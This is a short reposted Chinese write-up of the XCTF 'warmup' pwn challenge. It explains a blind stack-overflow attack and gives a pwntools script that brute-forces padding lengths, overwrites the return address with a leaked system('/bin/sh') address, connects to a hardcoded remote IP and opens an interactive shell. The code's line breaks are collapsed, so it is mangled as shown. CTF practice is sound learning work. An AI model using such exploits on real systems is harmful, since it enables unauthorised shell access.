[攻防世界 pwn]——warmup
生活随笔
收集整理的這篇文章主要介紹了
[攻防世界 pwn]——warmup
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[攻防世界 pwn]——warmup
- 題目地址: https://adworld.xctf.org.cn/
- 題目:
嘶, 碰過的第一個盲打的題, nc連上之后只有一個地址, 這個地址肯定是個有用的地址, 應該就是可以執行 system("/bin/sh")或者 system(“cat flag”)的地址。
提供了一個輸入, 應該是可以進行棧溢出, 不然就太難了。嘗試一下, 不過不知道要填充的長度也不知道是64位還是32位的。
我們只有挨個嘗試, 寫個exp如下:
exploit
from pwn import * ret_addr = 0x40060ddef fuzz(p, n, flag):payload = 'a' * nif flag==1:payload += p32(ret_addr)if flag==2:payload += p64(ret_addr)p.recvuntil(">")p.sendline(payload)def main():for i in range(1000):print(i)for j in range(1, 3):try:p = remote('111.200.241.244',45566)fuzz(p, i, j)print p.recv() p.interactive()except:p.close() main()總結
以上是生活随笔為你收集整理的[攻防世界 pwn]——warmup的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [攻防世界 pwn]——Mary_Mor
- 下一篇: [攻防世界 pwn]——time_for